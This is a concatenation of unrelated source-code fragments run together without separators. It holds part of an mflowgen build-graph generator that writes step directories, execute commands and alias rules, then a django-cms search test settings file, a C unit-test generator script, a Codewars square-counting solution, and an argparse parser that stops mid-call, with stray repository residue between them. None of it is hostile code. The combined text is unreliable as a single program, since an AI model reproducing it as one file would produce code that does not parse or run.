params = s.g.get_step( step_name ).params() params_str = 'export {}={}' params_commands = [] for k, v in params.items(): if type(v) is list: # can't export a list in bash, so need to serialize it serialized_value = ",".join(v) params_commands.append( params_str.format(k,serialized_value) ) else: params_commands.append( params_str.format(k,v) ) fd.write( '# Pre\n' ) fd.write( '\n' ) for c in params_commands: fd.write( c ) fd.write( '\n' ) fd.write( '\n' ) # Commands fd.write( '# Debug\n' ) fd.write( '\n' ) for c in commands: fd.write( c ) fd.write( '\n' ) fd.write( '\n' ) #----------------------------------------------------------------------- # dump_graphviz #----------------------------------------------------------------------- # Dump the graphviz dot file that visualizes the user-defined graph into # the hidden metadata directory. # # Note that this is not the build system graph, which is likely too # detailed to understand much from. 
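# Illustrative recap of the parameter-export convention used by
# dump_commands()/dump_debug_commands() above (list values are comma-joined
# because bash cannot export a list; the example params are hypothetical):
#   params = {'design_name': 'GcdUnit', 'views': ['rtl', 'gl']}
#   exports = ['export {}={}'.format(k, ','.join(v) if isinstance(v, list) else v)
#              for k, v in params.items()]
#   # -> ['export design_name=GcdUnit', 'export views=rtl,gl']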
# def dump_graphviz( s ): s.g.plot( dot_f = s.metadata_dir + '/graph.dot' ) #----------------------------------------------------------------------- # set_unique_build_ids #----------------------------------------------------------------------- # set_unique_build_ids # # Builds a dictionary that numbers the steps with unique IDs. # # For example: # # s.build_ids = { # 'step-foo': '1', # 'step-bar': '2', # 'step-baz': '3', # } # # Existing build directories claim their existing build ID with highest # priority. Remaining steps are assigned a build ID in topological order # counting up from 0 unless the ID is already claimed by an existing # step. # def set_unique_build_ids( s ): existing_build_ids = s._find_existing_build_ids() # Print a help message if existing_build_ids: print( ''' Found the following existing build directories. Their numbering will be preserved in the new graph, as will their build status (assuming the same graph connectivity). This prevents unnecessary rebuilds due solely to different numberings. This means that an existing step N will remain step N. For a completely clean build, run the "clean-all" target.\n''' ) for step_name, build_id in sorted( existing_build_ids.items(), \ key = lambda x: int(x[1]) ): print( '- {: >3} : {}'.format( build_id , build_id+'-'+step_name ) ) print() # Any existing steps get first claim on their existing build ids s.build_ids = existing_build_ids # Any remaining steps get a build id in topological sort order (while # skipping any already-claimed build ids) i = 0 for step_name in s.order: # Skip steps that have already been assigned if step_name in s.build_ids.keys(): continue # Find an unclaimed build id while str(i) in s.build_ids.values(): i += 1 s.build_ids[ step_name ] = str(i) i += 1 # _find_existing_build_ids # # Search for existing build directories of the form "4-step-foo". 
The # step name would be "step-foo" and this function would return the # following build ID dictionary: # # existing_build_ids = { 'step-foo': '4' } # def _find_existing_build_ids( s ): existing_build_ids = {} for dir_name in os.listdir('.'): # search the current directory if os.path.isdir( dir_name ): m = re.match( r'(\d+)-(.*)', dir_name ) if m: build_id = m.group(1) step_name = m.group(2) if step_name in s.order: # only save if also in the new graph if build_id not in existing_build_ids.values(): # keep unique existing_build_ids[ step_name ] = build_id return existing_build_ids #----------------------------------------------------------------------- # Setup #----------------------------------------------------------------------- def setup( s ): # Check the validity of this graph (no cycles) #assert s.g.check_cycles() == None # Expand parameters in the graph s.g.expand_params() # Determine build order s.order = s.g.topological_sort() # Determine unique build IDs and build directories s.set_unique_build_ids() s.build_dirs = { step_name: build_id + '-' + step_name \ for step_name, build_id in s.build_ids.items() } # Get step directories for step_name in s.order: s.step_dirs[ step_name ] = s.g.get_step( step_name ).get_dir() # Dump metadata about build vars and local connectivity to all steps s.g.dump_metadata_to_steps( build_dirs = s.build_dirs, build_ids = s.build_ids ) # Dump parameterized YAMLs for each step to the metadata directory for step_name, build_dir in s.build_dirs.items(): s.dump_yamls( step_name, build_dir ) # Dump commands for each step to the metadata directory for step_name, build_dir in s.build_dirs.items(): step = s.g.get_step( step_name ) step_commands = step.get_commands() if step_commands: s.dump_commands( step_commands, step_name, build_dir ) # Dump debug commands for each step to the metadata directory for step_name, build_dir in s.build_dirs.items(): step = s.g.get_step( step_name ) debug_commands = step.get_debug_commands() if debug_commands: s.dump_debug_commands( debug_commands, step_name, build_dir ) # Dump assertion check scripts for each step to the metadata directory for step_name, build_dir in s.build_dirs.items(): inner_dir = s.metadata_dir + '/' + build_dir if not os.path.exists( inner_dir ): os.mkdir( inner_dir ) dump_assertion_check_scripts( step_name, inner_dir ) # Dump graphviz dot file to the metadata directory s.dump_graphviz() #----------------------------------------------------------------------- # build #----------------------------------------------------------------------- # Turn the user-level step dependency graph into a build system # dependency graph and use the backend writer interface to generate the # build file. 
For each step in the graph, we create the following # targets: # # - directory -- Create build dir by copying the step template # - collect-inputs -- Collect dependencies into the 'inputs/' dir # - execute -- Run any commands for the step # - collect-outputs -- Collect tagged outputs into the 'outputs/' dir # - alias -- Define an alias for this step (i.e., step name) # # They are arranged with the following dependencies: # # +-----------+ # | directory | # +-----------+ # | | # | v # | +----------------+ # | | collect-inputs | # | +----------------+ # | | # v v # +---------+ # | execute | # +---------+ # | | # | +----------------+ # | | | # | v | # | +-----------------+ | # | | collect-outputs | | # | +-----------------+ | # | | | | # | | v v # | | +-----------------+ # | | | post-conditions | # | | +-----------------+ # | | | # v v v # +-------------------------+ # | alias | # +-------------------------+ # # These two extra edges allow steps to run even if they do not have any # inputs or outputs (e.g., analysis-only steps). # # - 'directory' -> 'execute' # - 'execute' -> 'alias' # #--------------------------------------------------------------------- # Additional notes on customized backends #--------------------------------------------------------------------- # Using this method and a backend writer interface works for most use # cases. # # For more customization (e.g., comments, formatting, any additional # rules not easily hooked in here), we also keep track of two variables: # # - s.build_system_rules <- access this via s.get_all_rules() # - s.build_system_deps <- access this via s.get_all_deps() # # A backend writer can use these variables to customize the output # much more flexibly, but it is also much more complicated! # # The data is organized like this: # # s.build_system_rules[ 'step1' ] = { # 'directory' : { ... kwargs to create directory ... }, # 'collect-inputs' : { ... kwargs to collect inputs ... }, # 'execute' : { ... kwargs to execute commands ... }, # 'collect-outputs' : { ... kwargs to collect outputs ... }, # 'alias' : { ... kwargs to create alias ... }, # } # # The high-level build system dependencies are also captured. So for # example, 'step1' can create its directory only when previous dependent # 'step0' has finished creating an alias. The backend build system is in # charge of taking whatever the target is (e.g., stamp files) and adding # it to the dependencies list according to this high-level information. # # s.build_system_deps[ 'step1' ] = { # 'directory' : [ ( 'step0', 'alias' ) ] # 'collect-inputs' : [ ( 'step1', 'directory' ) ] # 'execute' : [ ( 'step1', 'collect-inputs' ) ], # 'collect-outputs' : [ ( 'step1', 'execute' ) ], # 'alias' : [ ( 'step1', 'collect-outputs' ) ], # } # def build( s ): # Setup s.setup() # Pass useful data to the backend writer s.w.save( s.order, s.build_dirs, s.step_dirs ) # Backend writer prologue s.w.gen_header() s.w.gen_prologue() # Keep track of build-system-specific dependency trackers backend_outputs = {} # Loop over all steps in topological order for i, step_name in enumerate( s.order ): step = s.g.get_step( step_name ) build_dir = s.build_dirs[ step_name ] build_id = s.build_ids[ step_name ] s.build_system_rules[ step_name ] = {} s.build_system_deps[ step_name ] = {} backend_outputs[ step_name ] = {} # Use the backend writer to generate the step header s.w.gen_step_header( step_name ) #................................................................... 
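# NOTE: illustrative sketch, not part of the original source. The notes
# above describe the two dictionaries a customized backend can query
# through s.get_all_rules() and s.get_all_deps(): per-step, per-stage
# rule kwargs plus (step, stage) dependency tuples, which the backend
# turns into its own targets (e.g., stamp files). The hypothetical
# writer below only shows the shape of that data by printing a
# make-style rule skeleton.

def stamp_sketch( step, stage ):
  return '.stamp.{}.{}'.format( step, stage )

def dump_rule_skeleton_sketch( all_rules, all_deps ):
  for step, stages in all_rules.items():
    for stage in stages:
      deps = [ stamp_sketch( s_, st ) for s_, st in all_deps[ step ].get( stage, [] ) ]
      print( '{}: {}'.format( stamp_sketch( step, stage ), ' '.join( deps ) ) )

# A customized backend could call something like
#
#   dump_rule_skeleton_sketch( s.get_all_rules(), s.get_all_deps() )
#
# and then fill in each rule body from the per-stage kwargs.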
# directory #................................................................... s.w.gen_step_directory_pre() # Make the directory dependent on all source files step_template_dir = s.step_dirs[ step_name ] deps = [] #deps = get_files_in_dir( step_template_dir ) # Remove any broken symlinks from the dependency list deps_filtered = [] for f in deps: try: os.stat( f ) deps_filtered.append( f ) except OSError as e: pass deps = deps_filtered # Check if we are going to sandbox this step or symlink it sandbox = step.get_sandbox() # Rule # # - Remove the {dst} # - Copy the {src} to the {dst} # - This rule depends on {deps} # - {sandbox} True (copies src dir), False (symlinks src contents) # rule = { 'dst' : build_dir, 'src' : step_template_dir, 'deps' : deps, 'sandbox' : sandbox, } # Pull in any backend dependencies extra_deps = set() for edge in s.g.get_edges_i( step_name ): src_step_name, src_f = edge.get_src() for o in backend_outputs[src_step_name]['alias']: extra_deps.add( o ) extra_deps = list( extra_deps ) # Use the backend writer to generate the rule, and then grab any # backend dependencies t = s.w.gen_step_directory( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['directory'] = t # Metadata for customized backends s.build_system_rules[step_name]['directory'] = rule s.build_system_deps[step_name]['directory'] = set() for edge in s.g.get_edges_i( step_name ): src_step_name, src_f = edge.get_src() s.build_system_deps[step_name]['directory'].add( ( src_step_name, 'alias' ) ) #................................................................... # collect-inputs #................................................................... # For each incoming edge, trace back and collect the input (i.e., # symlink the src step's output to this step's input). s.w.gen_step_collect_inputs_pre() # Pull in any backend dependencies extra_deps = backend_outputs[step_name]['directory'] # Metadata for customized backends s.build_system_rules[step_name]['collect-inputs'] = [] # Use the backend writer to generate rules for each input, and then # grab any backend dependencies backend_outputs[step_name]['collect-inputs'] = [] for edge in s.g.get_edges_i( step_name ): src_step_name, src_f = edge.get_src() dst_step_name, dst_f = edge.get_dst() link_src = s.build_dirs[ src_step_name ] + '/outputs/' + src_f link_dst = s.build_dirs[ dst_step_name ] + '/inputs/' + dst_f # Rule # # - Symlink the {src} to the {dst} # - This rule depends on {deps} # rule = { 'dst' : link_dst, 'src' : link_src, 'deps' : [], } t = s.w.gen_step_collect_inputs( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['collect-inputs'] += t s.build_system_rules[step_name]['collect-inputs'].append( rule ) # Metadata for customized backends s.build_system_deps[step_name]['collect-inputs'] = set() s.build_system_deps[step_name]['collect-inputs'].add( ( step_name, 'directory' ) ) #................................................................... # execute #................................................................... # Executing the step just involves running the commands script saved # in the hidden metadata directory. 
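# NOTE: illustrative sketch, not part of the original source. The
# 'sandbox' flag in the directory rule above selects between copying the
# step template (True) and symlinking its contents (False). The real
# work is done by the generated build rule, not by Python; this
# standalone helper with hypothetical names only restates the intent of
# the two modes.

import os
import shutil

def materialize_step_dir_sketch( src, dst, sandbox ):
  # assumes {dst} does not exist yet; the generated rule removes it first
  if sandbox:
    shutil.copytree( src, dst )    # sandbox: full copy of the step template
  else:
    os.mkdir( dst )                # shared: symlink the template contents
    for f in os.listdir( src ):
      os.symlink( os.path.join( os.path.abspath( src ), f ),
                  os.path.join( dst, f ) )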
s.w.gen_step_execute_pre() # Outputs and commands outputs = [ build_dir + '/outputs/' + f \ for f in step.all_outputs_execute() ] if not outputs: outputs = [ build_dir + '/execute-phony' ] phony = True else: phony = False meta_build_dir = s.metadata_dir + '/' + build_dir run_script = meta_build_dir + '/' + s.mflowgen_run debug_script = meta_build_dir + '/' + s.mflowgen_debug precond_script = meta_build_dir + '/' + s.mflowgen_precond postcond_script = meta_build_dir + '/' + s.mflowgen_postcond commands = ' && '.join([ # FIRST set pipefail so we get correct error status at the end 'set -o pipefail', # Step banner in big letters get_top_dir() \ + '/mflowgen/scripts/mflowgen-letters -c -t ' + step_name, # Copy the command script to the build_dir 'chmod +x {}'.format( run_script ), 'cp -f {} {}'.format( run_script, build_dir ), # Copy the debug script to the build_dir if it exists 'if [[ -e ' + debug_script + ' ]]; then' \ + ' chmod +x {} &&'.format( debug_script ) \ + ' cp -f {} {}; fi'.format( debug_script, build_dir ), # Copy the precondition script to the build_dir if it exists 'if [[ -e ' + precond_script + ' ]]; then' \ + ' chmod +x {} &&'.format( precond_script ) \ + ' cp -f {} {}; fi'.format( precond_script, build_dir ), # Copy the postcondition script to the build_dir if it exists 'if [[ -e ' + postcond_script + ' ]]; then' \ + ' chmod +x {} &&'.format( postcond_script ) \ + ' cp -f {} {}; fi'.format( postcond_script, build_dir ), # Go into the build directory 'cd ' + build_dir, # Run the precondition checker if it exists 'if [[ -e ' + s.mflowgen_precond + ' ]]; then' \ + ' ./{x} || exit 1; fi'.format( x=s.mflowgen_precond ), # Run the commands './{x} 2>&1 | tee {x}.log || exit 1'.format( x=s.mflowgen_run ), # Return to top so backends can assume we never changed directory 'cd ..', ]) # Rule # # - Run the {command} # - Generate the {outputs} # - This rule depends on {deps} # rule = { 'outputs' : outputs, 'command' : commands, 'deps' : [], 'phony' : phony, } # Pull in any backend dependencies extra_deps = set() for o in backend_outputs[step_name]['directory']: extra_deps.add( o ) for o in backend_outputs[step_name]['collect-inputs']: extra_deps.add( o ) extra_deps = list( extra_deps ) # Use the backend writer to generate the rule, and then grab any # backend dependencies t = s.w.gen_step_execute( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['execute'] = t # Metadata for customized backends s.build_system_rules[step_name]['execute'] = rule s.build_system_deps[step_name]['execute'] = set() s.build_system_deps[step_name]['execute'].add( ( step_name, 'directory' ) ) s.build_system_deps[step_name]['execute'].add( ( step_name, 'collect-inputs' ) ) #................................................................... # collect-outputs #................................................................... # Outputs may be tagged or untagged in the YAML configuration: # # outputs: # - file1.txt : path/to/the/data.txt <-- tagged # - file2.txt <-- untagged # # Tagged outputs need to be symlinked to the 'outputs' directory. # Untagged outputs are assumed to be already in the 'outputs' # directory. # # Some backend build systems may need to process the untagged # outputs to build dependency edges (e.g., timestamping), so in this # section we collect rules for both tagged and untagged outputs. 
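# NOTE: illustrative sketch, not part of the original source. The
# execute-stage command built above is a single '&&'-joined string that
# uses bash features ('set -o pipefail', '[[ -e ... ]]'), so whatever
# backend runs it needs a bash-compatible shell. How a backend invokes
# it is backend-specific; the helper below is only an assumption about
# one minimal way to run such a string directly from Python.

import subprocess

def run_step_command_sketch( commands ):
  # executable='/bin/bash' so pipefail and [[ ]] behave as intended
  return subprocess.call( commands, shell=True, executable='/bin/bash' )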
s.w.gen_step_collect_outputs_pre() # Pull in any backend dependencies extra_deps = backend_outputs[step_name]['execute'] # Metadata for customized backends s.build_system_rules[step_name]['collect-outputs'] = { \ 'tagged' : [], 'untagged' : [], } # Use the backend writer to generate rules for each tagged output, # and then grab any backend dependencies backend_outputs[step_name]['collect-outputs'] = [] for o in step.all_outputs_tagged(): link_src = build_dir + '/' + o.values()[0] link_dst = build_dir + '/outputs/' + o.keys()[0] # Rule # # - Symlink the {src} to the {dst} # - This rule depends on {deps} # rule = { 'dst' : link_dst, 'src' : link_src, 'deps' : [], } t = s.w.gen_step_collect_outputs_tagged( extra_deps=extra_deps, **rule ) backend_outputs[step_name]['collect-outputs'] += t d = s.build_system_rules[step_name]['collect-outputs'] d['tagged'].append( rule ) # Do whatever is necessary to the untagged outputs for o in step.all_outputs_untagged(): f = build_dir + '/outputs/' + o # Rule # # - Do whatever is necessary to the untagged output {f} # - This rule depends on {deps} # rule = { 'f' : f, 'deps' : [], } t = s.w.gen_step_collect_outputs_untagged( extra_deps=extra_deps, **rule ) backend_outputs[step_name]['collect-outputs'] += t d = s.build_system_rules[step_name]['collect-outputs'] d['untagged'].append( rule ) # Metadata for customized backends s.build_system_deps[step_name]['collect-outputs'] = set() s.build_system_deps[step_name]['collect-outputs'].add( ( step_name, 'execute' ) ) #................................................................... # post-conditions #................................................................... # Here we assert post-conditions (if any) s.w.gen_step_post_conditions_pre() # Commands commands = ' && '.join([ # Go into the build directory 'cd ' + build_dir, # Run the postcondition checker if it exists 'if [[ -e ' + s.mflowgen_postcond + ' ]]; then' \ + ' ./{x} || exit 1; fi'.format( x=s.mflowgen_postcond ), # Return to top so backends can assume we never changed directory 'cd ..', ]) # Rule # # - Run the {command} # - This rule depends on {deps} # rule = { 'command' : commands, 'deps' : [], } # Pull in any backend dependencies extra_deps = set() for o in backend_outputs[step_name]['execute']: extra_deps.add( o ) for o in backend_outputs[step_name]['collect-outputs']: extra_deps.add( o ) extra_deps = list( extra_deps ) # Use the backend writer to generate the rule, and then grab any # backend dependencies t = s.w.gen_step_post_conditions( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['post-conditions'] = t # Metadata for customized backends s.build_system_rules[step_name]['post-conditions'] = rule s.build_system_deps[step_name]['post-conditions'] = set() s.build_system_deps[step_name]['post-conditions'].add( ( step_name, 'execute' ) ) s.build_system_deps[step_name]['post-conditions'].add( ( step_name, 'collect-outputs' ) ) #................................................................... # alias #................................................................... 
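# NOTE: illustrative sketch, not part of the original source. As
# documented above, tagged outputs in the YAML ("file1.txt :
# path/to/the/data.txt") parse as one-entry dicts and untagged outputs
# ("file2.txt") parse as plain strings; that is the distinction the
# collect-outputs loops rely on. A small standalone splitter with a
# hypothetical name:

def split_outputs_sketch( outputs ):
  tagged   = {}   # output name -> path inside the build dir (needs a symlink)
  untagged = []   # plain names, assumed to appear in outputs/ already
  for o in outputs:
    if isinstance( o, dict ):
      name, path = next( iter( o.items() ) )
      tagged[ name ] = path
    else:
      untagged.append( o )
  return tagged, untagged

# split_outputs_sketch( [ { 'file1.txt': 'path/to/the/data.txt' }, 'file2.txt' ] )
# -> ( { 'file1.txt': 'path/to/the/data.txt' }, [ 'file2.txt' ] )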
# Here we create nice names for building this entire step s.w.gen_step_alias_pre() # Pull in any backend dependencies extra_deps = set() for o in backend_outputs[step_name]['execute']: extra_deps.add( o ) for o in backend_outputs[step_name]['collect-outputs']: extra_deps.add( o ) for o in backend_outputs[step_name]['post-conditions']: extra_deps.add( o ) extra_deps = list( extra_deps ) # Metadata for customized backends s.build_system_rules[step_name]['alias'] = [] # Use the backend writer to generate rules for each input, and then # grab any backend dependencies backend_outputs[step_name]['alias'] = [] # Rule # # - Create an alias called {alias} for this step # - This rule depends on {deps} # rule = { 'alias' : step_name, 'deps' : [], } t = s.w.gen_step_alias( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['alias'] += t s.build_system_rules[step_name]['alias'].append( rule ) # Rule # # - Create an alias called {alias} for this step # - This rule depends on {deps} # rule = { 'alias' : build_id, 'deps' : [], } t = s.w.gen_step_alias( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['alias'] += t s.build_system_rules[step_name]['alias'].append( rule ) # Metadata for customized backends s.build_system_deps[step_name]['alias'] = set() s.build_system_deps[step_name]['alias'].add( ( step_name, 'execute' ) ) s.build_system_deps[step_name]['alias'].add( ( step_name, 'collect-outputs' ) ) s.build_system_deps[step_name]['alias'].add( ( step_name, 'post-conditions' ) ) #................................................................... # debug #................................................................... # Generate the debug commands if they are defined in the YAML. s.w.gen_step_debug_pre() debug_commands = step.get_debug_commands() if debug_commands: commands = ' && '.join([ 'cd ' + build_dir, './{x} 2>&1 | tee {x}.log'.format( x=s.mflowgen_debug ) ]) # Rule # # - Run the {command} # - Generate the {target} # - Use {build_id} to guarantee uniqueness # debug_target = 'debug-' + step_name rule = { 'target' : debug_target, 'command' : commands, 'build_id' : build_id, } s.w.gen_step_debug( **rule ) s.build_system_rules[step_name]['debug'] = [ rule ] # Rule # # - Create an alias called {alias} for this step # - This rule depends on {deps} # rule = { 'alias' : 'debug-' + build_id, 'deps' : [ debug_target ], 'extra_deps' : [], } s.w.gen_step_alias( **rule ) else: s.build_system_rules[step_name]['debug'] = [] # Now that all steps are done... # Call the backend writer's epilogue s.w.gen_epilogue() #----------------------------------------------------------------------- # Backend API #----------------------------------------------------------------------- # The backend targets a specific build system (e.g., make, ninja) and # uses this API to query what commands to generate. 
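# NOTE: illustrative sketch, not part of the original source. The alias
# and debug rules above mean each step can be invoked either by its name
# or by its build number, with two extra debug targets when the step
# defines debug commands. A tiny helper (hypothetical) restating which
# targets exist for one step:

def step_targets_sketch( step_name, build_id, has_debug ):
  targets = [ step_name, build_id ]
  if has_debug:
    targets += [ 'debug-' + step_name, 'debug-' + build_id ]
  return targets

# step_targets_sketch( 'step-foo', '3', has_debug=True )
# -> [ 'step-foo', '3', 'debug-step-foo', 'debug-3' ]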
def get_order( s ): return s.order def get_build_dir( s, step_name ): return s.build_dirs[step_name] def get_rules( s, step_name, stage ): return s.build_system_rules[step_name][stage] def get_deps( s, step_name, stage ): return s.build_system_deps[step_name][stage] def get_all_rules( s ): return s.build_system_rules def get_all_deps( s ): return s.build_system_deps #!/usr/bin/env python # -*- coding: utf-8 -*- gettext = lambda s: s import os HAYSTACK_CONNECTIONS = { 'default': { 'ENGINE': 'haystack.backends.solr_backend.SolrEngine', 'URL': 'http://localhost:9001/solr/default', 'TIMEOUT': 60 * 5, 'INCLUDE_SPELLING': True, 'BATCH_SIZE': 100, 'EXCLUDED_INDEXES': ['thirdpartyapp.search_indexes.BarIndex'], }, 'en': { 'ENGINE': 'haystack.backends.solr_backend.SolrEngine', 'URL': 'http://my-solr-server/solr/my-site-en/', 'TIMEOUT': 60 * 5, 'INCLUDE_SPELLING': True, 'BATCH_SIZE': 100, }, } HELPER_SETTINGS = { 'TEMPLATE_DIRS': ('aldryn_search/tests_data/templates/',), 'CMS_TEMPLATES': ( ('fullwidth.html', 'Fullwidth'), ('page.html', 'Normal page'), ('test.html', 'Normal page2'), ), 'ALLOWED_HOSTS': ['localhost'], 'CMS_LANGUAGES': {1: [{'code': 'en', 'name': 'English'}]}, 'LANGUAGES': (('en', 'English'),), 'LANGUAGE_CODE': 'en', #'TEMPLATE_LOADERS': ('aldryn_search.tests.FakeTemplateLoader',), 'HAYSTACK_CONNECTIONS': HAYSTACK_CONNECTIONS, 'CMS_PERMISSION': True, 'CMS_PLACEHOLDER_CONF': { 'content': {}, }, 'PLACEHOLDERS_SEARCH_LIST': { '*': {}, 'testpage': { 'include': ['content'], }, 'testpage2': {}, 'testpage3': { 'exclude': ['content', 'hidden_content'] }, 'testpage4': { 'include': ['content'], 'exclude': ['hidden_content'] }, 'testpage5': { 'include': ['hidden_content'], 'exclude': ['content'] }, 'testpage6': { 'include': ['hidden_content', 'content'], }, 'testpage7': { 'include': ['hidden_content'], } }, } def run(): from djangocms_helper import runner runner.cms('aldryn_search') if __name__ == '__main__': run() 1-10 #!/usr/bin/env python import yaml import argparse import os from common.Function import Function def generate_unit_tests(path, function_list): with open(path, "w") as output: output.write( """ #include #include #include #include #include #include #include #include #include #include #ifdef YEP_WINDOWS_OS #include #define YEP_ESCAPE_NORMAL_COLOR "" #define YEP_ESCAPE_RED_COLOR "" #define YEP_ESCAPE_GREEN_COLOR "" #define YEP_ESCAPE_YELLOW_COLOR "" #else #define YEP_ESCAPE_NORMAL_COLOR "\\x1B[0m" #define YEP_ESCAPE_RED_COLOR "\\x1B[31m" #define YEP_ESCAPE_GREEN_COLOR "\\x1B[32m" #define YEP_ESCAPE_YELLOW_COLOR "\\x1B[33m" #endif static const char* getMicroarchitectureName(YepCpuMicroarchitecture microarchitecture) { const YepSize bufferSize = 1024; static char buffer[bufferSize]; YepSize bufferLength = bufferSize - 1; YepStatus status = yepLibrary_GetString(YepEnumerationCpuMicroarchitecture, microarchitecture, YepStringTypeDescription, buffer, &bufferLength); assert(status == YepStatusOk); buffer[bufferLength] = '\\0'; return buffer; } static void reportFailedTest(const char* functionName, YepCpuMicroarchitecture microarchitecture) { #ifdef YEP_WINDOWS_OS CONSOLE_SCREEN_BUFFER_INFO bufferInfo; ::GetConsoleScreenBufferInfo(::GetStdHandle(STD_OUTPUT_HANDLE), &bufferInfo); printf("%s (%s): ", functionName, getMicroarchitectureName(microarchitecture)); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED | FOREGROUND_INTENSITY); printf("FAILED\\n"); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), bufferInfo.wAttributes); 
#else printf("%s (%s): %sFAILED%s\\n", functionName, getMicroarchitectureName(microarchitecture), YEP_ESCAPE_RED_COLOR, YEP_ESCAPE_NORMAL_COLOR); #endif } static void reportFailedTest(const char* functionName, YepCpuMicroarchitecture microarchitecture, float ulpError) { #ifdef YEP_WINDOWS_OS CONSOLE_SCREEN_BUFFER_INFO bufferInfo; ::GetConsoleScreenBufferInfo(::GetStdHandle(STD_OUTPUT_HANDLE), &bufferInfo); printf("%s (%s): ", functionName, getMicroarchitectureName(microarchitecture)); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED | FOREGROUND_INTENSITY); printf("FAILED"); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), bufferInfo.wAttributes); printf(" (%f ULP)\\n", ulpError); #else printf("%s (%s): %sFAILED%s (%f ULP)\\n", functionName, getMicroarchitectureName(microarchitecture), YEP_ESCAPE_RED_COLOR, YEP_ESCAPE_NORMAL_COLOR, ulpError); #endif } static void reportPassedTest(const char* functionName, YepCpuMicroarchitecture microarchitecture) { #ifdef YEP_WINDOWS_OS CONSOLE_SCREEN_BUFFER_INFO bufferInfo; ::GetConsoleScreenBufferInfo(::GetStdHandle(STD_OUTPUT_HANDLE), &bufferInfo); printf("%s (%s): ", functionName, getMicroarchitectureName(microarchitecture)); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_GREEN | FOREGROUND_INTENSITY); printf("PASSED\\n"); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), bufferInfo.wAttributes); #else printf("%s (%s): %sPASSED%s\\n", functionName, getMicroarchitectureName(microarchitecture), YEP_ESCAPE_GREEN_COLOR, YEP_ESCAPE_NORMAL_COLOR); #endif } static void reportSkippedTest(const char* functionName, YepCpuMicroarchitecture microarchitecture) { #ifdef YEP_WINDOWS_OS CONSOLE_SCREEN_BUFFER_INFO bufferInfo; ::GetConsoleScreenBufferInfo(::GetStdHandle(STD_OUTPUT_HANDLE), &bufferInfo); printf("%s (%s): ", functionName, getMicroarchitectureName(microarchitecture)); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_INTENSITY); printf("SKIPPED\\n"); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), bufferInfo.wAttributes); #else printf("%s (%s): %sSKIPPED%s\\n", functionName, getMicroarchitectureName(microarchitecture), YEP_ESCAPE_YELLOW_COLOR, YEP_ESCAPE_NORMAL_COLOR); #endif } """) for function in function_list: output.write(function.unit_test) output.write("\n\n") output.write("int main (int argc, char **argv) {\n") boolean_names = [ "test" + "_".join(func.name.split("_")[1:]) for func in function_list ] for name in boolean_names: output.write(" YepBoolean {} = YepBooleanFalse;\n".format(name)) output.write(" if (argc == 1) {\n") for name in boolean_names: output.write(" {} = YepBooleanTrue;\n".format(name)) output.write( """ } else { for (int i = 1; i < argc; i++) { """) else_part = "" for name in boolean_names: output.write( """ {}if (strcmp(argv[i], \"{}\") == 0) {{ {} = YepBooleanTrue; }} """.format(else_part, "_".join(name.split("_")[1:]), name)) else_part = "else " output.write(" }\n") output.write(" }\n") output.write( """ YepStatus status = _yepLibrary_InitCpuInfo(); assert(status == YepStatusOk); Yep64u supportedIsaFeatures, supportedSimdFeatures, supportedSystemFeatures; status = yepLibrary_GetCpuIsaFeatures(&supportedIsaFeatures); assert(status == YepStatusOk); status = yepLibrary_GetCpuSimdFeatures(&supportedSimdFeatures); assert(status == YepStatusOk); status = 
yepLibrary_GetCpuSystemFeatures(&supportedSystemFeatures); assert(status == YepStatusOk); Yep32s failedTests = 0; """) for name in boolean_names: output.write( """ if YEP_LIKELY({}) failedTests += {}(supportedIsaFeatures, supportedSimdFeatures, supportedSystemFeatures); """.format(name, "Test_{}".format(name[4:]))) output.write(" return failedTests;\n}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Unit Test Generator") parser.add_argument("-o", dest="output", required=True, help="Output file name") parser.add_argument("input", nargs=1) parser.add_argument("-op", dest="op", required=True, help="Operation to generate tests for") options = parser.parse_args() with open(options.input[0], "r") as specification_file: yaml_data = yaml.load(specification_file) module = yaml_data["module"] # Iterate through the operations of the module func_list = [] for op_set in yaml_data["functions"]: op = op_set["operation"] if op != options.op: continue # Skip the operations that we don't care about for func_group in op_set["function_groups"]: for func in func_group["group"]: func_list.append(Function(func, func_group)) generate_unit_tests(options.output, func_list) katas/kyu_6/Squares_in_a_Rectangle.py0 # https://www.codewars.com/kata/5a62da60d39ec5d947000093/ ''' Instructions : A rectangle can be split up into a grid of 1x1 squares, the amount of which being equal to the product of the two dimensions of the rectangle. Depending on the size of the rectangle, that grid of 1x1 squares can also be split up into larger squares, for example a 3x2 rectangle has a total of 8 squares, as there are 6 distinct 1x1 squares, and two possible 2x2 squares. A 4x3 rectangle contains 20 squares. Your task is to write a function `findSquares` that returns the total number of squares for any given rectangle, the dimensions of which being given as two integers with the first always being equal to or greater than the second. ''' def findSquares(m, n): if n < m: m, n = n, m return ((m * (m + 1) * (2 * m + 1) / 6 + (n - m) * m * (m + 1) / 2)) import argparse def extraction_parser(): parser = argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument( dest="img_filepath", type=str, help="Path to brain volume (.nii) data", ) parser.add_argument( dest="registration_folder", type=str, help="Path to cellfinder registration folder", ) parser.add_argument( "-od", "--output-directory", dest="output_directory", type=str, default=None, help="Path to directory where the log will be saved.", ) parser.add_argument( "-ow", "--overwrite", dest="overwrite", type=bool, default=True, help="If false files will not be overwritten.", ) parser.add_argument( "-o", "--obj-path", dest="obj_path", type=str, default=None, help="Path to output .obj file. Will default to the image directory.", ) parser.add_argument( "-k", "--gaussian-kernel", dest="gaussian_kernel", type=float, 